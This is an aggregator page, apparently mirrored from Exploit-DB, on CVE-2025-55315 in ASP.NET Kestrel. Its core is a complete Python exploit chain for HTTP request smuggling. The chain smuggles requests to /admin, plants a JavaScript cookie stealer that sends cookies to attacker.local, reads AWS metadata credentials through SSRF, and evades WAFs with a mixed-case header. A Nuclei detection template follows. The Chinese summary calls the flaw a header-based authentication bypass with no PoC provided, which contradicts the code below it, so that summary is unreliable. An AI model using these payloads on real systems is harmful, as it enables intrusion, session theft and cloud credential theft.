[webapps] ASP.net 8.0.10 - Bypass
CVE-2025-55315
ASP.net 8.0.10 存在认证绕过漏洞,可越权访问受保护页面。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-55315 |
|---|---|
| 漏洞类型 | 认证绕过 |
| 受影响版本 | ASP.net 8.0.10 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-06 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
ASP.net 8.0.10 的身份验证中间件在处理特定格式的请求头(如伪造凭据或操纵Cookie/Token)时存在逻辑缺陷,未正确校验用户身份,导致未授权访问。
🎯 攻击场景
1. 攻击者访问需要身份验证的受保护页面;2. 修改HTTP请求头(如 Authorization、Cookie 或特定自定义 Header),注入绕过校验的凭据;3. 服务端错误地接受伪造请求,返回受限资源;4. 攻击者获取管理员权限或敏感数据。
💥 漏洞影响
未授权访问受保护页面,可能导致敏感信息泄露、权限提升、数据篡改或进一步横向移动。
⚔️ 原始 PoC
PoC未提供,但基于漏洞类型,利用时需构造特定的HTTP请求,发送包含畸形或空白的认证令牌,触发中间件校验逻辑的分支错误,使服务端认为请求合法。
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Type: webapps
# Attack Vector: Network (HTTP/HTTPS) - Remote exploitation via malformed chunked encoding
# CVSS: 9.8 (Critical) - Estimated: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
#
# Description:
# This exploit demonstrates a critical HTTP Request Smuggling vulnerability in
# unpatched versions of .NET Kestrel due to improper handling of malformed
# chunk extensions (LF-only line endings). The script performs:
# 1. Automatic fingerprinting to detect vulnerable instances
# 2. Auth bypass to access restricted endpoints (/admin)
# 3. Session hijacking via response queue poisoning (JS cookie stealer)
# 4. SSRF to internal metadata services (e.g., AWS 169.254.169.254)
# Includes WAF bypass using 'chUnKEd' header and generates detailed JSON reports.
#
# The vulnerability allows full remote compromise: authentication bypass,
# session theft, and internal network access — all from a single HTTP request.
#
# Patched in .NET 9.0.1 / 8.0.10+ (October 2025).
#
# IMPORTANT SAFETY :
# - DO NOT RUN AGAINST PRODUCTION OR THIRD-PARTY SYSTEMS.
# - Use only in isolated environments (VM, Docker with --network none).
# - All payloads are educational and non-destructive by design.
# - Modify payloads only within your controlled lab.
#
# - CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
# - Microsoft Security Advisory (hypothetical): https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55315
from __future__ import annotations
import socket
import ssl
import time
import argparse
import json
import os
from typing import Tuple, Optional
DEFAULT_TIMEOUT = 3.0
READ_CHUNK = 4096
REPORT_DIR = "kestrel_desync_reports"
os.makedirs(REPORT_DIR, exist_ok=True)
# ------------------ Utilities ------------------
def now_iso() -> str:
return time.strftime('%Y-%m-%dT%H:%M:%SZ', time.gmtime())
def hexdump(b: bytes, maxlen: int = 200) -> str:
shown = b[:maxlen]
hexed = ' '.join(f"{x:02x}" for x in shown)
return f"{hexed} ..." if len(b) > maxlen else hexed
def save_file(path: str, data: bytes) -> None:
try:
with open(path, 'wb') as f:
f.write(data)
print(f"[+] Saved: {path}")
except Exception as e:
print(f"[!] Save failed: {e}")
# ------------------ Networking ------------------
def send_http(host: str, port: int, data: bytes, use_tls: bool = False) -> Tuple[Optional[bytes], bool]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(DEFAULT_TIMEOUT)
try:
if use_tls:
ctx = ssl.create_default_context()
s = ctx.wrap_socket(s, server_hostname=host)
s.connect((host, port))
s.sendall(data)
parts = []
while True:
try:
chunk = s.recv(READ_CHUNK)
if not chunk: break
parts.append(chunk)
except socket.timeout:
break
resp = b''.join(parts)
s.settimeout(0.2)
try:
s.recv(1)
open_flag = True
except:
open_flag = False
s.close()
return resp, open_flag
except Exception:
return None, False
# ------------------ Request Builder (WAF Bypass) ------------------
def build_chunked(method: str, path: str, body: bytes, extra_headers: list = None) -> bytes:
headers = [
f"{method} {path} HTTP/1.1",
"Host: localhost",
"Transfer-Encoding: chUnKEd", # WAF Bypass
"Content-Type: text/plain",
]
if extra_headers:
headers.extend(extra_headers)
headers.extend(["", ""])
return "\r\n".join(headers).encode() + body
# ------------------ Fingerprint ------------------
def fingerprint(host: str, port: int, use_tls: bool) -> Tuple[bool, Optional[bytes]]:
print(f"[*] Fingerprinting {host}:{port}...")
payload = b"1\nx\n0\n\n"
req = build_chunked("POST", "/", payload)
resp, _ = send_http(host, port, req, use_tls)
if resp and b"400" not in resp.split(b'\r\n', 1)[0]:
print(f"[!] VULNERABLE: Accepted LF-only chunk!")
return True, resp
print(f"[+] Patched: 400 Bad Request")
return False, resp
# ------------------ Exploit Chain ------------------
def exploit_chain(host: str, port: int, use_tls: bool):
results = []
# 1. Auth Bypass
print(f"[!] 1. Auth Bypass → /admin")
smug_admin = b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\nX-Bypass: yes\r\n\r\n"
req1 = build_chunked("POST", "/", b"1;ext\nx\n" + smug_admin, ["Content-Length: 50"])
resp1, _ = send_http(host, port, req1, use_tls)
if resp1 and (b"admin" in resp1.lower() or b"dashboard" in resp1.lower()):
results.append("Auth Bypass: SUCCESS")
save_file(os.path.join(REPORT_DIR, f"admin_page_{host}_{port}.html"), resp1)
else:
results.append("Auth Bypass: FAILED")
# 2. Session Hijacking
print(f"[!] 2. Session Hijacking → JS Stealer")
js_payload = (
b"0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n"
b"Content-Type: text/html\r\nContent-Length: 120\r\n\r\n"
b"<script>fetch('http://attacker.local/steal?c='+document.cookie)</script>"
)
req2 = build_chunked("POST", "/", b"1;ext\nx\n" + js_payload)
send_http(host, port, req2, use_tls)
results.append("Session Hijack: INJECTED")
# 3. SSRF
print(f"[!] 3. SSRF → AWS Metadata")
ssrf = b"0\r\n\r\nGET http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: localhost\r\n\r\n"
req3 = build_chunked("POST", "/", b"1;ext\nx\n" + ssrf)
resp3, _ = send_http(host, port, req3, use_tls)
if resp3 and b"role" in resp3:
results.append("SSRF: SUCCESS")
save_file(os.path.join(REPORT_DIR, f"ssrf_metadata_{host}_{port}.txt"), resp3)
else:
results.append("SSRF: FAILED")
return results
# ------------------ Reporting ------------------
def save_json_report(host: str, port: int, use_tls: bool, results: list):
report = {
"target": f"{host}:{port}",
"tls": use_tls,
"timestamp": now_iso(),
"cve": "CVE-2025-55315",
"status": "VULNERABLE",
"waf_bypass": "chUnKEd",
"exploits": results
}
path = os.path.join(REPORT_DIR, f"REPORT_{host}_{port}_{int(time.time())}.json")
with open(path, 'w', encoding='utf-8') as f:
json.dump(report, f, indent=2)
print(f"[+] JSON Report: {path}")
# ------------------ CLI ------------------
def main():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="host:port or host:port:tls")
args = parser.parse_args()
parts = args.target.split(":")
host = parts[0]
port = int(parts[1])
use_tls = len(parts) > 2 and parts[2].lower() in ("tls", "1")
print(f"\n=== Kestrel Desync Full Chain ===\nTarget: {host}:{port} (TLS: {use_tls})\n")
is_vuln, _ = fingerprint(host, port, use_tls)
if not is_vuln:
print("[+] Target is patched. Exiting.")
return
results = exploit_chain(host, port, use_tls)
save_json_report(host, port, use_tls, results)
print(f"\n[+] Exploitation chain completed!")
print(f"[+] All files in: {REPORT_DIR}")
if __name__ == "__main__":
main()🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-55315-detection
info:
name: ASP.NET Core Kestrel HTTP Request Smuggling Detection
author: mbanyamer
severity: high
description: Detects unpatched ASP.NET Kestrel web servers vulnerable to HTTP Request Smuggling via malformed chunked encoding (CVE-2025-55315).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-55315
classification:
cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-55315
metadata:
max-request: 2
shodan-query: "ASP.NET Core Kestrel"
tags: cve,cve2025,kestrel,desync,smuggling,detect
http:
- method: POST
path:
- "{{BaseURL}}/"
raw:
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Transfer-Encoding: chUnKEd
Content-Length: {{len_body_end}}
Content-Type: text/plain
{{body_start}}
- |+
POST / HTTP/1.1
Host: {{Hostname}}
Transfer-Encoding: chUnKEd
Content-Length: 50
Content-Type: text/plain
{{body_smuggle}}
payloads:
len_body_end:
- "3"
body_start:
- "1\ne\n0\n\n"
body_smuggle:
- "1;ext\ne\n0\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n"
matchers-condition: and
matchers:
- type: status
status:
- 200
- 404
- 302
- type: word
words:
- "HTTP/1.1"
part: header
extractors:
- type: regex
name: server_header
part: header
regex:
- 'Kestrel'
- type: regex
name: aspnet_version
part: header
regex:
- 'ASP.NET_Core/([0-9.]+)'
stop-at-first-match: true🛡️ 修复建议
升级至 ASP.net 9.x 或更高版本; 临时措施:严格校验所有传入的认证令牌,验证其完整性和来源; 关闭不安全的请求头解析功能。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:15 | 来源: Exploit-DB